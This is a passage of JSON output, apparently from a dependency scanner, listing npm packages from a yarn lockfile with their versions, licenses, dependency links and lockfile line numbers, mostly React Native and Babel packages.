"pkg:npm/react-native-image-resizer@1.4.5", "UID": "bc3de84e6da3d565" }, "Version": "1.4.5", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9067, "EndLine": 9070 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-image-zoom-viewer@3.0.1", "Name": "react-native-image-zoom-viewer", "Identifier": { "PURL": "pkg:npm/react-native-image-zoom-viewer@3.0.1", "UID": "ae50f32aaa385282" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-image-pan-zoom@2.1.12" ], "Locations": [ { "StartLine": 9072, "EndLine": 9077 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-keyboard-aware-scroll-view@0.9.5", "Name": "react-native-keyboard-aware-scroll-view", "Identifier": { "PURL": "pkg:npm/react-native-keyboard-aware-scroll-view@0.9.5", "UID": "4f3606dbc17e1d88" }, "Version": "0.9.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1", "react-native-iphone-x-helper@1.3.1" ], "Locations": [ { "StartLine": 9089, "EndLine": 9095 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-keychain@10.0.0", "Name": "react-native-keychain", "Identifier": { "PURL": "pkg:npm/react-native-keychain@10.0.0", "UID": "a6b16cd554501f89" }, "Version": "10.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9097, "EndLine": 9100 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-linear-gradient@2.8.3", "Name": "react-native-linear-gradient", "Identifier": { "PURL": "pkg:npm/react-native-linear-gradient@2.8.3", "UID": "c292dc118638af27" }, "Version": "2.8.3", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9102, "EndLine": 9105 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-localize@3.5.2", "Name": "react-native-localize", "Identifier": { "PURL": "pkg:npm/react-native-localize@3.5.2", "UID": "edab615b8faaad91" }, "Version": "3.5.2", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9107, "EndLine": 9110 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-maps@1.26.14", "Name": "react-native-maps", "Identifier": { "PURL": "pkg:npm/react-native-maps@1.26.14", "UID": "6334e2d1b52d3e74" }, "Version": "1.26.14", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@types/geojson@7946.0.16" ], "Locations": [ { "StartLine": 9112, "EndLine": 9117 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-markdown-display@7.0.2", "Name": "react-native-markdown-display", "Identifier": { "PURL": "pkg:npm/react-native-markdown-display@7.0.2", "UID": "98961c55e36d2ca6" }, "Version": "7.0.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "css-to-react-native@3.2.0", "markdown-it@10.0.0", "prop-types@15.8.1", "react-native-fit-image@1.5.5" ], "Locations": [ { "StartLine": 9119, "EndLine": 9127 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-mmkv@3.3.3", "Name": "react-native-mmkv", "Identifier": { "PURL": "pkg:npm/react-native-mmkv@3.3.3", "UID": "cfa3971fa76d5b51" }, "Version": "3.3.3", "Licenses": [ "(MIT AND BSD-3-Clause)" ], "Relationship": "direct", "Locations": [ { "StartLine": 9129, "EndLine": 9132 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-modal@14.0.0-rc.1", "Name": "react-native-modal", "Identifier": { "PURL": "pkg:npm/react-native-modal@14.0.0-rc.1", "UID": "29790bc44d98525" }, "Version": "14.0.0-rc.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-animatable@1.4.0" ], "Locations": [ { "StartLine": 9148, "EndLine": 9153 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-modal-datetime-picker@18.0.0", "Name": "react-native-modal-datetime-picker", "Identifier": { "PURL": "pkg:npm/react-native-modal-datetime-picker@18.0.0", "UID": "3567743dde0c2417" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 9134, "EndLine": 9139 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-modal-selector@2.1.2", "Name": "react-native-modal-selector", "Identifier": { "PURL": "pkg:npm/react-native-modal-selector@2.1.2", "UID": "d3657d4bd4948202" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 9141, "EndLine": 9146 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-multiple-select@0.5.12", "Name": "react-native-multiple-select", "Identifier": { "PURL": "pkg:npm/react-native-multiple-select@0.5.12", "UID": "25626653ff6d6c62" }, "Version": "0.5.12", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 9155, "EndLine": 9160 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-orientation-locker@1.7.0", "Name": "react-native-orientation-locker", "Identifier": { "PURL": "pkg:npm/react-native-orientation-locker@1.7.0", "UID": "ae67864ef590d476" }, "Version": "1.7.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9162, "EndLine": 9165 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-otp-inputs@7.4.0", "Name": "react-native-otp-inputs", "Identifier": { "PURL": "pkg:npm/react-native-otp-inputs@7.4.0", "UID": "4ce641b7d28f4e1f" }, "Version": "7.4.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9167, "EndLine": 9170 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-pager-view@8.0.0", "Name": "react-native-pager-view", "Identifier": { "PURL": "pkg:npm/react-native-pager-view@8.0.0", "UID": "77e31ef13548e804" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9172, "EndLine": 9175 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-paper@5.14.5", "Name": "react-native-paper", "Identifier": { "PURL": "pkg:npm/react-native-paper@5.14.5", "UID": "b6bf431c328d4729" }, "Version": "5.14.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@callstack/react-theme-provider@3.0.9", "color@3.2.1", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 9177, "EndLine": 9184 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-permissions@5.4.2", "Name": "react-native-permissions", "Identifier": { "PURL": "pkg:npm/react-native-permissions@5.4.2", "UID": "4e2d9886576776c0" }, "Version": "5.4.2", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9186, "EndLine": 9189 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-photo-manipulator@1.9.2", "Name": "react-native-photo-manipulator", "Identifier": { "PURL": "pkg:npm/react-native-photo-manipulator@1.9.2", "UID": "8bd23c33e3cffd29" }, "Version": "1.9.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "color-rgba@3.0.0" ], "Locations": [ { "StartLine": 9191, "EndLine": 9196 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-push-notification@8.1.1", "Name": "react-native-push-notification", "Identifier": { "PURL": "pkg:npm/react-native-push-notification@8.1.1", "UID": "3f0fc533c2812e00" }, "Version": "8.1.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9198, "EndLine": 9201 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-quick-crypto@0.7.17", "Name": "react-native-quick-crypto", "Identifier": { "PURL": "pkg:npm/react-native-quick-crypto@0.7.17", "UID": "5157b9faea04c0bc" }, "Version": "0.7.17", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@craftzdog/react-native-buffer@6.1.1", "events@3.3.0", "readable-stream@4.7.0", "string_decoder@1.3.0", "util@0.12.5" ], "Locations": [ { "StartLine": 9208, "EndLine": 9217 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-reanimated@4.3.0", "Name": "react-native-reanimated", "Identifier": { "PURL": "pkg:npm/react-native-reanimated@4.3.0", "UID": "82465ff232e1b071" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native-is-edge-to-edge@1.3.1", "semver@7.7.4" ], "Locations": [ { "StartLine": 9224, "EndLine": 9230 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-reanimated-carousel@4.0.3", "Name": "react-native-reanimated-carousel", "Identifier": { "PURL": "pkg:npm/react-native-reanimated-carousel@4.0.3", "UID": "5597ae8c3bfaf778" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9219, "EndLine": 9222 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-responsive-screen@1.4.2", "Name": "react-native-responsive-screen", "Identifier": { "PURL": "pkg:npm/react-native-responsive-screen@1.4.2", "UID": "583906b6b34d83a8" }, "Version": "1.4.2", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9232, "EndLine": 9235 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-safe-area-context@5.6.1", "Name": "react-native-safe-area-context", "Identifier": { "PURL": "pkg:npm/react-native-safe-area-context@5.6.1", "UID": "4cfc4a0151d9c4f8" }, "Version": "5.6.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9237, "EndLine": 9240 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-screens@4.16.0", "Name": "react-native-screens", "Identifier": { "PURL": "pkg:npm/react-native-screens@4.16.0", "UID": "642f0207cff0a30f" }, "Version": "4.16.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-freeze@1.0.4", "react-native-is-edge-to-edge@1.3.1", "warn-once@0.1.1" ], "Locations": [ { "StartLine": 9242, "EndLine": 9249 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-send-intent@1.3.0", "Name": "react-native-send-intent", "Identifier": { "PURL": "pkg:npm/react-native-send-intent@1.3.0", "UID": "825d1a47e9473b2d" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9251, "EndLine": 9254 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-share@12.2.6", "Name": "react-native-share", "Identifier": { "PURL": "pkg:npm/react-native-share@12.2.6", "UID": "684cc0cdf5ace582" }, "Version": "12.2.6", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9256, "EndLine": 9259 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-snackbar@2.9.0", "Name": "react-native-snackbar", "Identifier": { "PURL": "pkg:npm/react-native-snackbar@2.9.0", "UID": "efa4a499095da0bf" }, "Version": "2.9.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9261, "EndLine": 9264 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-snap-carousel@3.9.1", "Name": "react-native-snap-carousel", "Identifier": { "PURL": "pkg:npm/react-native-snap-carousel@3.9.1", "UID": "39c8449a4422887f" }, "Version": "3.9.1", "Licenses": [ "BSD-3-Clause" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1", "react-addons-shallow-compare@15.6.2" ], "Locations": [ { "StartLine": 9266, "EndLine": 9272 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-splash-screen@3.3.0", "Name": "react-native-splash-screen", "Identifier": { "PURL": "pkg:npm/react-native-splash-screen@3.3.0", "UID": "42c0e7e6c2c913e6" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9274, "EndLine": 9277 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-sqlite-2@3.6.2", "Name": "react-native-sqlite-2", "Identifier": { "PURL": "pkg:npm/react-native-sqlite-2@3.6.2", "UID": "1fd277de01f3ab10" }, "Version": "3.6.2", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "DependsOn": [ "lodash.map@4.6.0", "lodash.zipobject@4.1.3", "websql@2.0.3" ], "Locations": [ { "StartLine": 9279, "EndLine": 9286 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-svg@15.14.0", "Name": "react-native-svg", "Identifier": { "PURL": "pkg:npm/react-native-svg@15.14.0", "UID": "4f28a74772ed46a3" }, "Version": "15.14.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "css-select@5.2.2", "css-tree@1.1.3", "warn-once@0.1.1" ], "Locations": [ { "StartLine": 9298, "EndLine": 9305 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-svg-transformer@1.5.1", "Name": "react-native-svg-transformer", "Identifier": { "PURL": "pkg:npm/react-native-svg-transformer@1.5.1", "UID": "29c87f521234561f" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@svgr/core@8.1.0", "@svgr/plugin-jsx@8.1.0", "@svgr/plugin-svgo@8.1.0", "path-dirname@1.0.2" ], "Locations": [ { "StartLine": 9288, "EndLine": 9296 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-tab-view@4.3.0", "Name": "react-native-tab-view", "Identifier": { "PURL": "pkg:npm/react-native-tab-view@4.3.0", "UID": "a4d0c62f033aa82d" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 9307, "EndLine": 9312 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-tts@4.1.1", "Name": "react-native-tts", "Identifier": { "PURL": "pkg:npm/react-native-tts@4.1.1", "UID": "1da266f7e5f0ded2" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9314, "EndLine": 9317 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-vector-icons@10.3.0", "Name": "react-native-vector-icons", "Identifier": { "PURL": "pkg:npm/react-native-vector-icons@10.3.0", "UID": "4d93ebc9176b8e0b" }, "Version": "10.3.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "prop-types@15.8.1", "yargs@16.2.0" ], "Locations": [ { "StartLine": 9319, "EndLine": 9325 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-video@6.17.0", "Name": "react-native-video", "Identifier": { "PURL": "pkg:npm/react-native-video@6.17.0", "UID": "5fd1a40f493c8ed8" }, "Version": "6.17.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9334, "EndLine": 9337 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-video-controls@2.8.1", "Name": "react-native-video-controls", "Identifier": { "PURL": "pkg:npm/react-native-video-controls@2.8.1", "UID": "72905eeb55df2af8" }, "Version": "2.8.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "lodash@4.17.21" ], "Locations": [ { "StartLine": 9327, "EndLine": 9332 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-view-shot@4.0.3", "Name": "react-native-view-shot", "Identifier": { "PURL": "pkg:npm/react-native-view-shot@4.0.3", "UID": "2b86d07e57a1a0cb" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "html2canvas@1.4.1" ], "Locations": [ { "StartLine": 9339, "EndLine": 9344 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-vision-camera@4.7.2", "Name": "react-native-vision-camera", "Identifier": { "PURL": "pkg:npm/react-native-vision-camera@4.7.2", "UID": "b145baa2b7f13505" }, "Version": "4.7.2", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9351, "EndLine": 9354 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-vision-camera-v3-image-labeling@1.5.0", "Name": "react-native-vision-camera-v3-image-labeling", "Identifier": { "PURL": "pkg:npm/react-native-vision-camera-v3-image-labeling@1.5.0", "UID": "573a4720f838ba8a" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9346, "EndLine": 9349 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-webview@13.16.0", "Name": "react-native-webview", "Identifier": { "PURL": "pkg:npm/react-native-webview@13.16.0", "UID": "876135000ae74a36" }, "Version": "13.16.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "escape-string-regexp@4.0.0", "invariant@2.2.4" ], "Locations": [ { "StartLine": 9356, "EndLine": 9362 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-worklets@0.8.1", "Name": "react-native-worklets", "Identifier": { "PURL": "pkg:npm/react-native-worklets@0.8.1", "UID": "3ce967dce8aad39c" }, "Version": "0.8.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@babel/plugin-transform-arrow-functions@7.27.1", "@babel/plugin-transform-class-properties@7.27.1", "@babel/plugin-transform-classes@7.28.4", "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", "@babel/plugin-transform-optional-chaining@7.27.1", "@babel/plugin-transform-shorthand-properties@7.27.1", "@babel/plugin-transform-template-literals@7.27.1", "@babel/plugin-transform-unicode-regex@7.27.1", "@babel/preset-typescript@7.27.1", "convert-source-map@2.0.0", "semver@7.7.4" ], "Locations": [ { "StartLine": 9371, "EndLine": 9386 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-worklets-core@1.6.3", "Name": "react-native-worklets-core", "Identifier": { "PURL": "pkg:npm/react-native-worklets-core@1.6.3", "UID": "d5fecd69ee48186b" }, "Version": "1.6.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "string-hash-64@1.0.3" ], "Locations": [ { "StartLine": 9364, "EndLine": 9369 } ], "AnalyzedBy": "yarn" }, { "ID": "react-redux@9.2.0", "Name": "react-redux", "Identifier": { "PURL": "pkg:npm/react-redux@9.2.0", "UID": "a945a69c14e627e2" }, "Version": "9.2.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@types/use-sync-external-store@0.0.6", "use-sync-external-store@1.6.0" ], "Locations": [ { "StartLine": 9428, "EndLine": 9434 } ], "AnalyzedBy": "yarn" }, { "ID": "redux@5.0.1", "Name": "redux", "Identifier": { "PURL": "pkg:npm/redux@5.0.1", "UID": "6fb0b797fa624fa0" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 9522, "EndLine": 9525 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/code-frame@7.10.4", "Name": "@babel/code-frame", "Identifier": { "PURL": "pkg:npm/%40babel/code-frame@7.10.4", "UID": "53c00e6f2c4efd0c" }, "Version": "7.10.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/highlight@7.25.9" ], "Locations": [ { "StartLine": 14, "EndLine": 19 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/code-frame@7.27.1", "Name": "@babel/code-frame", "Identifier": { "PURL": "pkg:npm/%40babel/code-frame@7.27.1", "UID": "1889ab0ad02c3550" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-validator-identifier@7.27.1", "js-tokens@4.0.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 5, "EndLine": 12 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/compat-data@7.28.4", "Name": "@babel/compat-data", "Identifier": { "PURL": "pkg:npm/%40babel/compat-data@7.28.4", "UID": "9bfb60259242cc24" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21, "EndLine": 24 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/core@7.28.4", "Name": "@babel/core", "Identifier": { "PURL": "pkg:npm/%40babel/core@7.28.4", "UID": "1125de9b38fb88ee" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/generator@7.28.3", "@babel/helper-compilation-targets@7.27.2", "@babel/helper-module-transforms@7.28.3", "@babel/helpers@7.28.4", "@babel/parser@7.28.4", "@babel/template@7.27.2", "@babel/traverse@7.28.4", "@babel/types@7.28.4", "@jridgewell/remapping@2.3.5", "convert-source-map@2.0.0", "debug@4.4.3", "gensync@1.0.0-beta.2", "json5@2.2.3", "semver@6.3.1" ], "Locations": [ { "StartLine": 26, "EndLine": 45 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/generator@7.28.3", "Name": "@babel/generator", "Identifier": { "PURL": "pkg:npm/%40babel/generator@7.28.3", "UID": "cdc8292b3f9c7a32" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/parser@7.28.4", "@babel/types@7.28.4", "@jridgewell/gen-mapping@0.3.13", "@jridgewell/trace-mapping@0.3.31", "jsesc@3.1.0" ], "Locations": [ { "StartLine": 56, "EndLine": 65 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-annotate-as-pure@7.27.3", "Name": "@babel/helper-annotate-as-pure", "Identifier": { "PURL": "pkg:npm/%40babel/helper-annotate-as-pure@7.27.3", "UID": "e9e6887915370c65" }, "Version": "7.27.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 67, "EndLine": 72 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-compilation-targets@7.27.2", "Name": "@babel/helper-compilation-targets", "Identifier": { "PURL": "pkg:npm/%40babel/helper-compilation-targets@7.27.2", "UID": "da06c71d3885ff08" }, "Version": "7.27.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/compat-data@7.28.4", "@babel/helper-validator-option@7.27.1", "browserslist@4.26.3", "lru-cache@5.1.1", "semver@6.3.1" ], "Locations": [ { "StartLine": 74, "EndLine": 83 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-create-class-features-plugin@7.28.3", "Name": "@babel/helper-create-class-features-plugin", "Identifier": { "PURL": "pkg:npm/%40babel/helper-create-class-features-plugin@7.28.3", "UID": "fdac7b971289a2f3" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-annotate-as-pure@7.27.3", "@babel/helper-member-expression-to-functions@7.27.1", "@babel/helper-optimise-call-expression@7.27.1", "@babel/helper-replace-supers@7.27.1", "@babel/helper-skip-transparent-expression-wrappers@7.27.1", "@babel/traverse@7.28.4", "semver@6.3.1" ], "Locations": [ { "StartLine": 85, "EndLine": 96 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-create-regexp-features-plugin@7.27.1", "Name": "@babel/helper-create-regexp-features-plugin", "Identifier": { "PURL": "pkg:npm/%40babel/helper-create-regexp-features-plugin@7.27.1", "UID": "abc73a81345cf11f" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-annotate-as-pure@7.27.3", "regexpu-core@6.4.0", "semver@6.3.1" ], "Locations": [ { "StartLine": 98, "EndLine": 105 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-globals@7.28.0", "Name": "@babel/helper-globals", "Identifier": { "PURL": "pkg:npm/%40babel/helper-globals@7.28.0", "UID": "c9e7cda569d03203" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 118, "EndLine": 121 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-member-expression-to-functions@7.27.1", "Name": "@babel/helper-member-expression-to-functions", "Identifier": { "PURL": "pkg:npm/%40babel/helper-member-expression-to-functions@7.27.1", "UID": "a8c227a249c1f910" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 123, "EndLine": 129 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-module-imports@7.27.1", "Name": "@babel/helper-module-imports", "Identifier": { "PURL": "pkg:npm/%40babel/helper-module-imports@7.27.1", "UID": "13d6918fac8c7f2b" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 131, "EndLine": 137 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-module-transforms@7.28.3", "Name": "@babel/helper-module-transforms", "Identifier": { "PURL": "pkg:npm/%40babel/helper-module-transforms@7.28.3", "UID": "b2c27c58b37de3c5" }, "Version": "7.28.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-module-imports@7.27.1", "@babel/helper-validator-identifier@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 139, "EndLine": 146 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-optimise-call-expression@7.27.1", "Name": "@babel/helper-optimise-call-expression", "Identifier": { "PURL": "pkg:npm/%40babel/helper-optimise-call-expression@7.27.1", "UID": "4c82aaea84bde718" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 148, "EndLine": 153 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-plugin-utils@7.27.1", "Name": "@babel/helper-plugin-utils", "Identifier": { "PURL": "pkg:npm/%40babel/helper-plugin-utils@7.27.1", "UID": "a6efd2de4b3e4e3b" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 155, "EndLine": 158 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-replace-supers@7.27.1", "Name": "@babel/helper-replace-supers", "Identifier": { "PURL": "pkg:npm/%40babel/helper-replace-supers@7.27.1", "UID": "756f45fb8bc40c20" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-member-expression-to-functions@7.27.1", "@babel/helper-optimise-call-expression@7.27.1", "@babel/traverse@7.28.4" ], "Locations": [ { "StartLine": 169, "EndLine": 176 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-skip-transparent-expression-wrappers@7.27.1", "Name": "@babel/helper-skip-transparent-expression-wrappers", "Identifier": { "PURL": "pkg:npm/%40babel/helper-skip-transparent-expression-wrappers@7.27.1", "UID": "5242621dd6b0200" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 178, "EndLine": 184 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-string-parser@7.27.1", "Name": "@babel/helper-string-parser", "Identifier": { "PURL": "pkg:npm/%40babel/helper-string-parser@7.27.1", "UID": "b71281ac41ae9037" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 186, "EndLine": 189 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-validator-identifier@7.27.1", "Name": "@babel/helper-validator-identifier", "Identifier": { "PURL": "pkg:npm/%40babel/helper-validator-identifier@7.27.1", "UID": "a1c9d21935bbb942" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 191, "EndLine": 194 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helper-validator-option@7.27.1", "Name": "@babel/helper-validator-option", "Identifier": { "PURL": "pkg:npm/%40babel/helper-validator-option@7.27.1", "UID": "c34f8bb8b01e17f7" }, "Version": "7.27.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 196, "EndLine": 199 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/helpers@7.28.4", "Name": "@babel/helpers", "Identifier": { "PURL": "pkg:npm/%40babel/helpers@7.28.4", "UID": "707511c79c392432" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/template@7.27.2", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 210, "EndLine": 216 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/highlight@7.25.9", "Name": "@babel/highlight", "Identifier": { "PURL": "pkg:npm/%40babel/highlight@7.25.9", "UID": "a02ee69d0e6d0aaf" }, "Version": "7.25.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-validator-identifier@7.27.1", "chalk@2.4.2", "js-tokens@4.0.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 218, "EndLine": 226 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/parser@7.28.4", "Name": "@babel/parser", "Identifier": { "PURL": "pkg:npm/%40babel/parser@7.28.4", "UID": "f34c2e5ef7edf51e" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 228, "EndLine": 233 } ], "AnalyzedBy": "yarn" }, { "ID": "@babel/plugin-syntax-async-generators@7.8.4", "Name": "@babel/plugin-syntax-async-generators", "Identifier": { "PURL": 